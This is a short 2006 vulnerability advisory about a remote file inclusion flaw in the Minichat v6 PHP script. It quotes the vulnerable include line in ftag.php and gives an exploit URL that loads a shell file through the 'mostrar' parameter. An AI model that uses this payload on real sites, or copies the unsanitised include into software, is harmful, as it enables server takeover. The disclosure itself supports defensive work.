Exploits Minichat v6 Remote File Include

2006-10-12T00:00:00
ID SECURITYVULNS:DOC:14656
Type securityvulns
Reporter Securityvulns
Modified 2006-10-12T00:00:00

Description

 Minichat v6 Remote File Include

Affected Software .: Minichat v6 Class................... : Remote File Inclusion Found by.............: Zickox Contact. ...............: los_misfits[at]hotmail.com

Download Software:

http://www.linkini.net/phpscripts/descargas/Tagboards%20(12%20Archivos)/Minichat%20v6.0%20-%20Con%20instalador.zip

Affected File:

ftag.php

Code vulnerable:

<? include($_GET['mostrar']); ?>

Exploit:

http://www.victim.com/path/ftag.php?mostrar=shell.txt?

Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team